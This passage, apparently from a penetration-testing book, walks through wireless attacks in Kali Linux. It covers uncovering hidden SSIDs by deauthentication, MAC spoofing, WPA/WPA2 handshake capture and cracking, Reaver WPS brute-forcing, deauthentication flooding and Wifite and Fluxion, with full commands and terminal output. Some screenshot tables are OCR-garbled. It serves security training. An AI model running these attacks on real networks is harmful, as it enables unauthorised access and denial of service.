It can also be used to sniff data from 802.11a, 802.11b, 802.11g, and 802.11n wireless traffic. Kismet also supports plugins that allow it to sniff other wireless protocols.

To launch Kismet, enter kismet from a command prompt in the Terminal window.

When Kismet is launched, you will be faced with a series of questions that will allow you to configure it during the startup process. Respond with Yes to Can you see colors, accept Kismet is running as root, and select Yes to Start Kismet Server. In the Kismet startup options, uncheck Show Console as it will obscure the screen. Allow Kismet to start.

You will be prompted to add a capture interface; usually, wlano will be selected.

Kismet will then start sniffing packets and collect information about all the wireless systems located in the immediate physical neighborhood, as shown in the following screenshot:



Selecting a network by double-clicking on it will bring you to a network view that provides additional information on the wireless network.

You can also drill down to identify specific clients that connect to the various wireless networks.

Use Kismet as an initial reconnaissance tool to launch some specific attacks (such as sniffing transmitted data) or to identify networks. Because it passively collects connectivity data, it is an excellent tool for identifying networks that are hidden, especially when the SSID is not being publicly transmitted.

Bypassing a hidden SSID

ESSID is the sequence of characters that uniquely identify a wireless local area network. Hiding the ESSID is a poor method of attempting to achieve security through obscurity; unfortunately, the ESSID can be obtained by doing either of the following:

- Sniffing the wireless environment and waiting for a client to associate to a network and then capturing that association
- Actively deauthenticating a client to force the client to associate and then capturing that association

The aircrack tools are particularly well-suited to capture the data that's needed to unhide a hidden ESSID, as shown in the following steps:

1. At the command prompt, confirm that wireless is enabled on the attacking system by entering the following command:

```
root@kali:~# airmon-ng
```

- 2. Next, use the following *ifconfig* command to review the available interfaces and to determine the exact name that's used by your wireless system:
- root@kali:~# ifconfig
- 3. Enable your wireless interface by entering the following (you may need to replace wlan0 with an available wireless interface that was identified in the previous step):

```
root@kali:~# airmon-ng start wlan0
```

4. If you reconfirm with ifconfig, you will see that there is now a monitoring or wlanomon address in use. Now use airodump to confirm the available wireless networks, by entering the following command:

```
root@kali:~# airodump-ng wlan0mon
```

| CH 8][Elapsed: | 12 s |][2019-DI | -11 D6:5 | 75 | | | | | | |
|-------------------|------|------------|----------------|-----|----|-----|------|--------|------|--------------------------|
| BSSID | PWR. | Beacons | <i>∯</i> Data, | ŧ/s | CH | MB | ENC | CIPHER | AUTH | ESSID |
| 04:62:73:43:09:52 | -1 | | 1 | | 1 | -1 | WPA: | | | <length: 0=""></length:> |
| 04:62:73:43:09:56 | -1 | | G. | O. | 12 | -1 | | | | <length: 0=""></length:> |
| AC:86:74:0B:B3:E5 | -1 | | 0 | 0 | 11 | -1 | | | | <length: 0=""></length:> |
| F0:7D:68:44:61:EA | -47 | 26 | 103 | 11 | 11 | 130 | WPA2 | CCMP | PSK: | <length: d=""></length:> |
| 84:78:AC:C1:40:C2 | -54 | 4 | 0 | | 11 | 195 | WPA2 | CCMP | MGT | 55BS LoadingBay |
| 84:78:AC:C1:40:C4 | -54 | 4 | O, | G | 11 | 195 | WEA2 | CCMP | MGT | <length: 1=""></length:> |
| 84:78:AC:C1:40:C0 | -54 | | 0 | 0 | 11 | 195 | OFN | | | BDO Guest |
| 84:78:AC:C1:40:C1 | -54 | 5 | 0 | 0 | 11 | 195 | WPA2 | CCMP | MGT | SUPTES Wi-Fi |

As you can see, the first network's ESSID is identified only as <length: 0>, as it appears in the preceding screenshot. No other name or designation is used. The length of the hidden ESSID is identified as being composed of nine characters; however, this value may not be correct because the ESSID is hidden. The true ESSID length may actually be shorter or longer than nine characters.

What is important is that there may be clients attached to this particular network. If clients are present, we will de-authenticate the client, forcing them to send the ESSID when they reconnect to the access point.

5. Rerun airodump and filter out everything but the target access point. In this particular case, we will focus on collecting data from the hidden network on channel six using the following command:

```
root@kali:~# airodump-ng -c 11 wlan0mon
```

Executing this command removes the output from the multiple wireless sources, and allows the attacker to focus on the target ESSID, as shown in the following screenshot:

| CH 11] Elapsed; | 0 5] | [20 | 19-01-11 | 06:46 | 11 | fixed | cha | nnel | wlan0 | non: 13 | | | |
|-------------------|-------|------|-----------|-------|------|-------|-----|------|---------|---------|------|---|-----|
| BSSID | PWR | EXQ | Beacons | ₿Da | ita, | #/s | CH | MB | ENC | CIPHER | AUTH | ESSID | |
| F0:7D:68:44:61:EA | -34 | 0 | 4 | 1 | 26 | 0 | 11 | 130 | WEA2 | CCMP | PSK | <length:< td=""><td>0></td></length:<> | 0> |
| 84:78:AC:C1:40:C6 | -53 | 0 | 20 | | 0 | 0 | 11 | 195 | OPN OPN | COMP | 1,22 | | |
| 84:78:AC:99:1F:62 | -59 | 0 | 2 | | 0 | | 11 | 195 | WPA2 | CCMP | MGT | | 201 |
| BSSID | STAT | TON | | PWR | я | ate | Lo | st | Frame | es Proi | be | | |
| F0:7D:68:44:61:EA | E8:2 | A:EA | :C1:F6:E2 | -28 | | 0e- 0 | e | 53 | | 30 | | | |
| F0:7D:68:44:61:EA | DC:A | 9:04 | :78:29:1B | -32 | | 0e-0 | e. | 74 | | 95 | | | |
| 84:78:AC:99:1F:65 | 0C:2 | A:69 | :11:69:92 | -1 | - 3 | 6e- 0 | | | | 3 | | | |

The data that we get when the airodump command is executed indicates
that there are two stations (E8:2A:EA:C1:F6:E2 and DC-A9:04:78:29:1B) connected to the BSSID (F0:7D:68:44:61:EA), which is, in turn, associated with the hidden ESSID.

6. To capture the ESSID as it is being transmitted, we need to create a condition where we know it will be sent—during the initial stage of the connection between a client and the access point.

Therefore, we will launch a de-authentication attack against both the client and the access point by sending a stream of packets that breaks the connection between them and forces them to re-authenticate.

To launch the attack, open a new command shell and enter the command that's shown in the following screenshot ($_{0}$ indicates that we are launching a deauthentication attack, $_{10}$ indicates that we will send $_{10}$ deauthentication packets, $_{-a}$ is the target access point, and $_{c}$ is the client's MAC address):

| root@kali | :~# airep | lay | -ng -0 1 | 0 -a E0 | :7D:68 | :44: | 61:EA -c | DC:A9: | 04:76 | :29:18 | wlan0mor | 1 |
|-----------|-----------|-----|----------|---------|--------|------|----------|---------|-------|---------|----------|-------|
| 07:16:50 | Waiting | for | beacon | frame | BSSID: | FO: | 7D:68:44 | :61:EA) | on c | hannel | 11 | |
| 07:16:51 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9: | 04:78 | :29:1B] | [42]77 | ACKs] |
| 07:16:51 | Sending | 64 | directed | DeAuth | (code | 7) . | STMAC: | [DC:A9: | 04:78 | :29:1B] | [10]109 | ACKs] |
| 07:16:52 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9: | 04:78 | :29:1B] | [13 68 | ACKs] |
| 07:16:53 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9: | 04:78 | :29:1B] | [15]71 | ACKs] |
| 07:16:53 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9: | 04:78 | :29:1B] | [19]79 | ACKs] |
| 07:16:54 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9: | 04:78 | :29:1B] | [14]71 | ACKS] |
| 07:16:54 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9: | 04:78 | :29:18] | [14]72 | ACKS] |
| 07:16:55 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9: | 04:78 | :29:1B] | [13]66 | ACKS] |
| 07:16:56 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9: | 04:76 | :29:1B] | [46199 | ACKS] |
| 07:16:56 | Sending | 64 | directed | DeAuth | {code | 7). | STMAC: | [DC:A9: | 04:78 | :29:1B] | [7173 | ACKs] |

7. After all the de-authentication packets have been sent, return to the original window that monitors the network connection on channel six, as shown in the following screenshot:

| CE II][Elapsed: | 54:0 |][5 | 019-01-11 | 07:19 1[| WPA | hand | bhake | : 84: | 78;AC:9 | 9;1E; | 65 | |
|-------------------|------|------|-----------|----------|-----|------|-------|-------|---------|-------|---|----|
| BSSID | EWR. | RXQ | Beacons | #Data, | €/5 | CH | MB | ENC- | CIPHER | AUTH | ESSID | |
| 84:38:AC:C1:38:85 | -1 | | | | | -1 | -1 | | | | 12 E | |
| E4:78:AC:99:6D:36 | -1 | | | | | 11 | -1 | | | | <length:< td=""><td>0></td></length:<> | 0> |
| F0:7D:68:44:61:EA | -31 | | 559 | 19850 | 161 | 11 | 130 | WPA2 | COMP | DSK | Cyber Lab | |
| 84:78:AC:C1:40:C2 | -4B | 11 | 482 | | 0 | 11 | 195 | WPA2 | COMP | MGT | St. Conserver | |
| B4:78:AC:C1:40:C3 | -4.9 | 11 | 457 | | | 11 | 195 | WPA2 | COMP | DEK | | |

You will now see the ESSID in the clear.

Knowing the ESSID helps an attacker to confirm that they are focused on the

correct network (because most ESSIDs are based on the corporate identity) and facilitates the logon process.

Bypassing the MAC address authentication and open authentication

The **Media Access Control (MAC)** address uniquely identifies each node in a network. It takes the form of six pairs of hexadecimal digits (0 to 9 and the letters A to F) that are separated by colons or dashes, and usually appears like this: 00:50:56:C0:00:01.

The MAC address is usually associated with a network adapter or a device with networking capability; for this reason, it's frequently called the physical address.

The first three pairs of digits in the MAC address are called the **Organizational Unique Identifier**, and they serve to identify the company that manufactured or sold the device. The last three pairs of digits are specific to the device and can be considered to be a serial number.

Because a MAC address is unique, it can be used to associate a user to a particular network, especially a wireless network. This has two significant implications—it can be used to identify a hacker or a legitimate network tester who has tried to access a network, and it can be used as a means of authenticating individuals and granting them access to a network.

During penetration testing, the tester may prefer to appear anonymous to a network. One way to support this anonymous profile is to change the MAC address of the attacking system.

This can be done manually using the *ifconfig* command. To determine the existing MAC address, run the following from a command shell:

|root@kali:~# ifconfig wlan0 down |root@kali:~# ifconfig wlan0 | grep HW

To manually change the IP address, use the following commands:

```
root@kali:~# ifconfig wlan0 hw ether 38:33:15:xx:xx
root@kali:~# ifconfig wlan0 up
```

Substitute different hexadecimal pairs for the xx expressions. This command will allow us to change the attacking system's MAC address to one that is used and accepted by the victim network. The attacker must ensure that the MAC address is not already in use on the network, or the repeated MAC address may trigger an alarm if the network is being monitored.



The wireless interface must be brought down before changing the MAC address.

Kali also permits the use of an automated tool, macchanger. To change the attacker's MAC address to a MAC address of a product produced by the same vendor, use the following macchanger command from a Terminal window:

```
|root@kali:~# macchanger wlan0 -e
```

To change the existing MAC address to a completely random MAC address, use the following command. You should be able to see the macchanger tool, as shown in the following screenshot:

```
|root@kali:~# macchanger wlan0 -r
```

The following screenshot provides the new MAC address assigned for our wireless adapter:

```
root@kali:~# ifconfig wlan0 down
root@kali:~# macchanger wlan0 -r
Current MAC: 8c:70:5a:8c:cc:65 (Intel Corporate)
Permanent MAC: 8c:70:5a:8c:cc:65 (Intel Corporate)
New MAC: 42:9d:f9:cb:66:f7 (unknown)
```

Some attackers use automated scripts to change their MAC addresses on a frequent basis during testing to anonymize their activities.

Many organizations, particularly large academic groups, such as colleges and universities, use MAC address filtering to control who can access their wireless network resources. MAC address filtering uses the unique MAC address on the network card to control access to network resources; in a typical configuration, the organization maintains a **whitelist** of the MAC addresses that are permitted to access the network. If an incoming MAC address is not on the approved access list, it is restricted from connecting to the network.

Unfortunately, MAC address information is transmitted in the clear text. An attacker can use airodump to collect a list of accepted MAC addresses and then manually change their MAC address to one of the addresses that is accepted by the target network. Therefore, this type of filtering provides almost no real protection to a wireless network.

The next level of wireless network protection is provided using encryption.

Attacking WPA and WPA2

Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access 2 (WPA2) are

wireless security protocols that were intended to address the security shortcomings of WEP. Because the WPA protocols dynamically generate a new key for each packet, they prevent the statistical analysis that caused WEP to fail. Nevertheless, they are vulnerable to some attack techniques as well.

WPA and WPA2 are frequently deployed with a **pre-shared key** (**PSK**) to secure communications between the access point and the wireless clients. The PSK should be a random passphrase of at least 13 characters in length; if not, it is possible to determine the PSK using a brute-force attack by comparing the PSK to a known dictionary. This is the most common attack.



Note that if configured in the Enterprise mode, which provides authentication using a RADIUS authentication server, it might require more power machines to crack the key or perform different types of MiTM attacks.

Brute-force attacks

Unlike WEP, which can be broken using a statistical analysis of a large number of packets, WPA decryption requires the attacker to create specific packet types that reveal details, such as the handshake between the access point and the client.

To attack a WPA transmission, the following steps should be performed:

- 1. Start the wireless adapter and use the *ifconfig* command to ensure that the monitor interface has been created.
- 2. Use airodump-ng -wlan0 to identify the target network.
- 3. Start capturing traffic between the target access point and the client using the following command:

```
root@kali:~# airodump-ng --bssid F0:7D:68:44:61:EA -c 11 --showack --output-form
```

4. Set -c to monitor a specific channel, --write to write the output to a file for a dictionary attack later, and the --showack flag to ensure that the client computer acknowledges your request to deauthenticate it from the wireless access point. A typical output from this attack is shown in the following screenshot:

CH 11][Elapsed: 0 s][2019-01-11 08:38

| BSSID | PWR RXQ Beacons | # Data, | ⋕/s CH | MB | ENC CIR | PHER AUTH | ESSID | |
|--|--|--|--|--------------------------|-----------------------------------|-----------|---|----|
| F0:7D:68:44:61:EA | -31 0 46 | 1025 | 227 11 | 130 | WPA2 CCM | AP PSK | <length:< td=""><td>]></td></length:<> |]> |
| BSSID | STATION | PWR R | ate Io | ost | Franes | Probe | | |
| F0:7D:68:44:61:EA F0:7D:68:44:61:EA F0:7D:68:44:61:EA F0:7D:68:44:61:EA F0:7D:68:44:61:EA F0:7D:68:44:61:EA | E8:2A:EA:19:C7:DD 88:E9:FE:6B:C4:03 DC:A9:04:78:29:1B 7C:76:35:67:46:6B 7C:2A:31:2C:7F:13 E8:2A:EA:C1:F6:E2 | -27 -36 -33 -30 -26 -28 | 0e- 2e 0e-11e 0e-11e 0e- 0e 0e- 6e 0e- 0e | 0 27 2 0 784 | 7 17 101 31 56 850 | | | |

- 5. Leave this Terminal window open and open a second Terminal window to launch a de-authentication attack; this will force the user to reauthenticate to the target access point and re-exchange the WPA key. The de-authentication attack command is shown as follows:
- root@kali:~# aireplay-ng -0 10 -a <BSSID> -c <STATION ID> wlan0mon The following screenshot shows that the aireplay-ng in action for deauthenticating a station connected to particular BSSID.

| root@kali | :~# airep | olay | y-ng -0 1 | 0 -a PO | :7D:68: | :44: | 61:EA -0 | : DC:A9:0 | 14:78:29:1B | wlan0mon |
|-----------|-----------|------|------------|---------|---------|------|----------|-----------|--------------|---------------|
| 07:16:50 | Waiting | for | r beacon : | frame | BSSID: | F0: | 7D:68:44 | 1:61:EA) | on channel | 11 |
| 07:16:51 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9:0 | 14:78:29:1B] | [42 77 ACKs] |
| 07:16:51 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9:0 | 4:78:29:1B] | [10 105 ACKs] |
| 07:16:52 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | DC:A9:0 |)4:78:29:1B] | [13 68 ACKs] |
| 07:16:53 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9:0 |)4:78:29:1B] | [15 71 ACKs] |
| 07:16:53 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9:0 |)4:70:29:1B] | [19 79 ACKs] |
| 07:16:54 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9:0 |)4:78:29:1B] | [14 71 ACKs] |
| 07:16:54 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9:0 | 04:78:29:1B] | [14]72 ACKs] |
| 07:16:55 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9:0 | 04:78:29:1B] | [13]66 ACKs] |
| 07:16:56 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | [DC:A9:0 | 4:78:29:1B] | [46 99 ACKs] |
| 07:16:56 | Sending | 64 | directed | DeAuth | (code | 7). | STMAC: | IDC:A9:6 |)4:78:29:1B] | [7 73 ACKs] |

- 6. A successful de-authentication attack will show ACKS, which indicates that the client who was connected to the target access point has acknowledged the de-authentication command that was just sent.
- 7. Review the original command shell that was kept open to monitor the wireless transmission, and ensure that you capture the four-way handshake. A successful WPA handshake will be identified in the top-right hand corner of the console .In the following example, the data indicates that the WPA handshake value is F0:7D:68:44:61:EA:

| CH 11][Elapsed: | 1 min][2019-01-11 | 00:35][WPA | handshak | e: F0:7D:68: | 44:61:EA |
|---|--|--|---------------------------------------|--|---------------|
| BSSID | PWR RXQ Beacons | #Data, #/s | CH MB | ENC CIPHER | AUTH ESSID |
| F0:7D:68:44:61:EA | -32 0 685 | 18248 238 | 11 130 | WPA2 CCMP | P5K Cyber Lab |
| BSSID | STATION | PWR Rate | Lost | Frames Pro | be |
| F0:7D:68:44:61:EA F0:7D:68:44:61:EA F0:7D:68:44:61:EA F0:7D:68:44:61:EA F0:7D:68:44:61:EA F0:7D:68:44:61:EA F0:7D:68:44:61:EA | 7C:2A:31:2C:7F:13 E8:2A:EA:C1:F6:E2 7C:76:35:67:46:6B DC:A9:04:78:29:1B 88:E9:FE:6B:C4:03 E8:2A:EA:19:C7:DD | -29 08- 6 -28 08- 0 -29 08- 0 -33 08-11 -38 08-11 -37 08- 2 | ie 1 ie 11 ie 375 e 0 e 0 | 1672 13357 1686 2897 367 82 | |

8. Use aircrack to crack the WPA key using a defined wordlist. The filename

that was defined by the attacker for collecting handshake data will be located in the root directory, and the .cap extension will be appended to it.

In Kali, wordlists are located in the /usr/share/wordlists directory. Although several wordlists are available, it is recommended that you download lists that will be more effective in breaking common passwords.

In the previous example, the key was preplaced in the password list. Undertaking a dictionary attack for a long, complex password can take several hours, depending on the system configuration. The following command uses words as the source wordlist:

```
root@kali:~# aircrack-ng -w passwordlist -b BSSID /root/Output.cap
```

The following screenshot shows the results from successfully cracking the WPA key; the key to the network gaffer was found to be Letmein!@1 after testing six well-known keys:

| | | | | A | irc | cac. | k-ng | <u>j</u> 1 | .5.2 | 2 | | | | | | | |
|----------------|----|-----|-----|-----|------|------|------|------------|------|-----|----|----|----|----|----|-----|-----|
| [00:00:00] 4/3 | k | eys | te: | ste | d () | 16. | 48 1 | c/s |) | | | | | | | | |
| Time left: 0 s | ec | ond | 3 | | | | | | | | | | | | 1 | 33. | 338 |
| | | | KE | f F | DUNI | 01 | [Le | etine | ein | 101 | Ì | | | | | | |
| Master Kev | | 80 | 20 | OR | CD | ER | 60 | 04 | RD. | 20 | CA | 42 | 70 | 58 | RF | BF | RF |
| impeor not | | 1E | 7D | 8B | AC | 45 | DA | 60 | AC | 79 | 53 | EE | 1C | 2D | 97 | E6 | 70 |
| Transient Key | ः | 56 | 6F | 44 | EA | 56 | CE | 7C | DF | 6A | EF | BC | 9E | 13 | 60 | 26 | FA |
| | | 32 | 21 | A8 | DD | 7D | 73 | 56 | 5F | 1B | Cl | 02 | 6E | 02 | 65 | AO | 8E |
| | | FE | 47 | Fl | 3B | B4 | 23 | AF | EE | F4 | 09 | 90 | 0D | 33 | 3F | 4A | A3 |
| | | 1A | 6F | 70 | 7E | B3 | 21 | 20 | 83 | DA | A9 | 91 | 41 | A4 | FD | BO | 38 |
| EAPOL HMAC | ः | 04 | 4E | 56 | 6C | 69 | D9 | 42 | 0A | 18 | AD | D3 | 90 | 14 | A5 | A6 | 25 |

If you don't have a custom password list at hand or wish to rapidly generate a list, you can use the crunch application in Kali. The following command

instructs crunch to create a wordlist of words with a minimum length of 5 characters and a maximum length of 25 characters using the given character set:

|root@kali:~# crunch 5 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789

You can also improve the effectiveness of the brute-force attack using GPUbased password cracking tools (oclHashcat for AMD/ATI graphics cards and cudaHashcat for NVIDIA graphics cards).

To implement this attack, first convert the WPA handshake capture file, psk-01.cap, to a hashcat file using the following command:

root@kali:~# aircrack-ng /root/Desktop/wifi/nameofthewifi.cap -J <output file>

When the conversion is completed, run the hashcat against the new capture file (choose the version of hashcat that matches your CPU architecture and your graphics card) using the following command:

```
root@kali:~# cuda Hashcat-plus32.bin -m 2500 <filename>.hccap
<wordlist>
```

If you have multiple GPUs, you can utilize Pyrit to crack the password. Pyrit allows the attackers to create massive amounts of pre-computed WPA/WPA-PSK protocols. Pyrit can be downloaded from https://github.com/JPaulMora/Pyrit. This tool utilizes other platforms such as ATI-Stream, Nvidia CUDA, and OpenCL with the computational power of multiple CPUs. An attacker can utilize John the Ripper, cowpatty, along with Pyrit to crack the password from the captured wireless traffic by using the following command in a Terminal:

```
|# john --stdout --incremental:all | pyrit -e WIFIESSID -i 1 -o - passthrough | cowpatty
```

Basically, John the Ripper will create a dictionary incrementally for all the characters, special characters, and numbers. Later, the output will be passed through to Pyrit to crack the password using the passthrough keyword, and additionally cowpatty will crack the password for a particular WiFi-ESSID.

Attacking wireless routers with Reaver

WPA and WPA2 are also vulnerable to attacks against an access point's **Wi-Fi Protected Setup (WPS)** and pin number.

Most access points support the WPS protocol, which emerged as a standard in 2006 to allow users to easily set up and configure access points and add new devices to an existing network without having to re-enter large and complex passphrases.

Unfortunately, the pin is an eight-digit number (100,000,000 possible guesses), but the last number is a checksum value. Because the WPS authentication protocol cuts the pin in half and validates each half separately, this means that there are 10⁴ (10,000) values for the first half of the pin, and 10³ (1,000) possible values for the second half—the attacker only has to make a maximum of 11,000 guesses to compromise the access point!

Reaver is a tool that's designed to maximize the guessing process (although a Wifite also conducts WPS guesses).

To start a Reaver attack, use the wash companion tool to identify any vulnerable networks, as shown in the following command:

|root@kali:~# wash -i wlan0 --ignore-fcs

If there are any vulnerable networks, launch an attack against them using the following command:

|root@kali:~# reaver -i wlan0 -b (BBSID) -vv Attackers should be able to see the following screenshot when running the reaver tool from the Terminal:

oot@kali:~# reaver -i wlan1 -b C0:05:C2:02:85:61 -vv Reaver v1.6.5 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Waiting for beacon from C0:05:C2:02:85:61 [+] Switching wlan1 to channel 11 [+] Received beacon from C0:85:C2:02:85:61 [+] Vendor: AtherosC [+] Trying pin "12345670" [+] Sending authentication request [1] Found packet with bad FCS, skipping... [+] Sending association request [+] Associated with C0:05:C2:02:85:61 (ESSID: VM5345129) [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message (+) Received M1 message (+) Sending WSC NACK [+] Sending WSC NACK WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin "12345670" [+] Sending authentication request [+] Sending association request [+] Associated with C0:05:C2:02:85:61 (ESSID: VM5345129) [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response

Testing this attack in Kali has demonstrated that the attack is slow and is prone to failure; however, it can be used as a background attack or can supplement other routes of attack to compromise the WPA network.

Denial-of-service (DoS) attacks against wireless communications

The final attack against wireless networks that we'll evaluate is DoS attacks, where an attacker deprives a legitimate user of access to a wireless network or makes the network unavailable by causing it to crash. Wireless networks are extremely susceptible to DoS attacks, and it is difficult to localize the attacker on a distributed wireless network. Examples of DoS attacks include the following:

- Injecting crafted network commands, such as reconfiguration commands, on to a wireless network can cause the failure of routers, switches, and other network devices.
- Some devices and applications can recognize that an attack is taking place and will automatically respond by disabling the network. A malicious attacker can launch an obvious attack and then let the target create the DoS itself!
- Bombarding the wireless network with a flood of data packets can make it unavailable for use; for example, an HTTP flood attack making thousands of page requests to a web server can exhaust its processing ability. In the same way, flooding the network with authentication and association packets blocks users from connecting to the access points.
- Attackers can craft specific deauthentication and disassociation commands, which are used in wireless networks to close an authorized connection and flood the network, thereby stopping legitimate users from maintaining their connection to a wireless access point.

To demonstrate this last point, we will create a DoS attack by flooding a network with de-authentication packets. Because the wireless 802.11 protocol is built to support de-authentication upon the receipt of a defined packet (so that a user can break a connection when it is no longer required), this can be a devastating attack—it complies with the standard, and there is no way to stop it from happening.

The easiest way to bump a legitimate user off a network is to target them with a stream of de-authentication packets. This can be done with the help of the

aircrack-ng tool suite:

|root@kali:~# aireplay-ng -0 0 -a (bssid) -c wlan0

This command identifies the attack type as -0, indicating that it is for a deauthentication attack. The second 0 (zero) launches a continuous stream of deauthentication packets, making the network unavailable to its users.

The Websploit framework is an open source tool that's used to scan and analyze remote systems. It contains several tools, including tools that are specific to wireless attacks. To launch it, open a command shell and simply type websploit. It can be installed by running apt-get install websploit in the Terminal.

The Websploit interface is similar to that of recon-ng and the Metasploit framework, and it presents the user with a modular interface.

Once launched, use the show modules command to see the attack modules that are present in the existing version. Select the Wi-Fi jammer (a stream of deauthentication packets) using the use wifi/wifi_jammer command. As shown in the following screenshot, the attacker just has to use the set commands to set the various options and then select run to launch the attack:

| <u>wsf</u> > use wit wsf:Wifi_Jam | fi/wifi_jammer <u>mer</u> > show options | | |
|--------------------------------------|---|-------|-------------------------|
| Options | Value | RQ | Description |
| | | | |
| interface | wlan0 | yes | Wireless Interface Name |
| bssid | | yes | Target BSSID Address |
| essid | | yes | Target ESSID Name |
| mon ult) | wlan0mon | Asso. | yes Monitor Mod(defa |
| channel | 11 | yes | Target Channel Number |

Compromising enterprise implementations of WPA/WPA2

WPA enterprise is a technology that's utilized in widespread corporations. It does not use a single WPA-PSK, which most of the users use to connect to the wireless network. To maintain the governance and the flexibility of the domain accounts, corporates utilize the implementation of WPA enterprise.

A typical approach to compromising an enterprise wireless would be first to enumerate the wireless devices and finally attack the connected clients to find out the authentication details. This consists of spoofing a target network and also providing a good signal to the client. Then, the original valid access point later leads into a MiTM attack between the **Access Point** (**AP**) and the clients connecting to the AP. To simulate an enterprise WPA attack, attackers must be physically near to the target when they have a range of access points. Attackers can also sniff the traffic using Wireshark to identify the wireless network traffic handshake.

In this section, we will explore two different tools that attackers would typically utilize to perform different types of attack on WPA/WPA2 Enterprise.

Wifite is an automatic wireless attack tool that's preinstalled in Kali Linux, and is written in Python. The latest version of Wifite is V2, which has previously known aircrack-ng bugs.

This tool utilizes the following attacks to extract the password of a wireless access point:

- **WPS**: The Offline Pixie Dust attack and the Online Brute-Force PIN attack
- **WPA**: The WPA Handshake Capture and offline crack, and the PMKID Hash Capture and offline crack
- **WEP**: All of the aforementioned attacks, including chop-chop, fragmentation, and aireplay injection

Now we are all set to start Wifite so that we can perform a WPA four-way

handshake capture and then perform an auto password cracking attack. This tool can be directly launched from the Terminal by typing wifite. Attackers should be presented with the interactive mode so that they can select an interface, as shown in the following screenshot:



Once the interface has been selected, it should automatically enable the adapter in monitor mode and start to list all the Wi-Fi ESSID, channel, encryption, and power, regardless of whether it is WPS or not, as well as the number of clients connected to a particular ESSID. Once the target ESSID is selected, attackers should press Ctrl + C from the keyboard, which should launch the attack.

By default, four attack types would be launched automatically. These are WPS Pixie Dust, WPS PIN, PMKID, and WPA Handshake. Attackers can choose to ignore the first three attacks if they aren't relevant by pressing Ctrl + C. While the handshake is being captured, attackers can see which clients have been discovered that are connected to the station. Once the handshake has been captured, by default, the copy of the handshake be will stored in the current folder, hs/handshake_ESSID_MAC.cap.

Once the handshake has been successfully captured, it will be analysed using tshark, Pyrit, cowpatty, and aircrack-ng, which will validate the handshake for ESSID and BSSID.

Wifite is programmed to automatically use a wordlist to run with aircrack-ng. The custom wordlist can also be passed directly while launching Wifite by typing wifite -wpa -dict /path/customwordlist. A successful handshake cracking would typically return the password for the wireless access point (router), as shown in the following screenshot:

File Edit View Search Terminal Help

```
[ Interrupted
[+] 1 attack(s) remain
   Do you want to continue attacking, or must (C, w)?
   Cyber Lab (62db) WPA Handshake capture: Discovered new client: EB:2A:E4:19:C7:0D
[+] Cyber Lab (62db) WPA Mandshake capture: Discovered new client: E8:2A:EA:CI:F0:E2
[+] Cyber Lab (62db) WPA Handshake capture: Discovered new client: DC:A9:64:78:29:18
 Cyber Lab (62db) WPA Handshake capture: Discovered new client: 88:E9:FE:6B:C4:03
   Cyber Lab (62db) WPA Handshake capture: Discovered new client: 48:45:20:53:10:8E
   Cyber Lab (66db) WPA Handshake capture: Discovered new client: 00.E0121.F5:35:04
+ Cyber Lab (62db) WPA Handshake capture: Discovered new client: 40:90:20:28:AC:83
 +] Cyber Lab (65db) WPA Handshake capture: Discovered new client: 7C:2A:31/2C:7F:13
  Cyber Lob (65db) WPA Handshake conture: Discovered new client: E4:47:98:88:64:26
 +] Cyber Lab (65db) WPA Handshake capture: Discovered new client: 44:91:68:AB:CA:37
[+] Cyber Lab (66db) WPA Handshake capture: Discovered new client: 84:F6:10:A0:1E
[+] Cyber Lab (63db) WPA Handshake capture: Captured handshake
[+] saving copy of handshake to hs/handshake Cyberlab F8-70-68-44-61-E8 2019-01-11T11-48-11.cap saved
[+] analysis of captured handshake file:
     tshark: .cap file contains a valid handshake for f0:7d:68:44:61:ea
      pyrit: .cap file new not contain a valid handshake
   compatty: .cap file contains a valid handshake for (Cyber Lab)
   aircrack: .cap file dee not contain a valid handshake
[+] Cracking WPA Handshake: Running aircracking with Nordlist-top4808-probable.txt wordlist
 + Cracking MPA Handshake: 84.33% ETA: 8s @ 5252.3kps (current key: tuppence)
[+] Cracked WPA Handshake PSK: Letnein[H]
      Access Point Name: Cyber Lab
    Access Point BSSID: F0:70:68:44:61:EA
            Encryption: WPA
        Handshake File: hs/handshake LyberLab F0-70-68-44-61-EA 2019-01-11711-48-11 cap
         PSK (password): Letmein/@1
   saved crack result to cracked.txt (1 total)
   Finished attacking 1 target(s), exiting
    Note: Leaving interface in Monitor Mode!
    To disable Monitor Mode when finished: airmon-ng stop
```

All the passwords will be saved in the cracked.txt file in the current folder from where Wifite was run from. The tool has an anonymous feature that can change MAC to a random address before attacking, and then change it back when attacks are complete.

Now, we will take a deep dive into **Fluxion**, which is an automatic wireless attack tool that's used to evade wireless and create evil access points, which are written in a mix of Bash and Python.

The latest version of Fluxion can be downloaded by running git clone https://github.com/wi-fi-analyzer/fluxion.git. This tool is based on linset script (https ://github.com/vk496/linset) of evil twin attack Bash scripts.

Attackers can utilize this tool to perform the following type of attacks:

- Scans the wireless networks
- Utilizes packet capture to find out the handshake (provided a valid handshake has been done)
- Provides a web interface
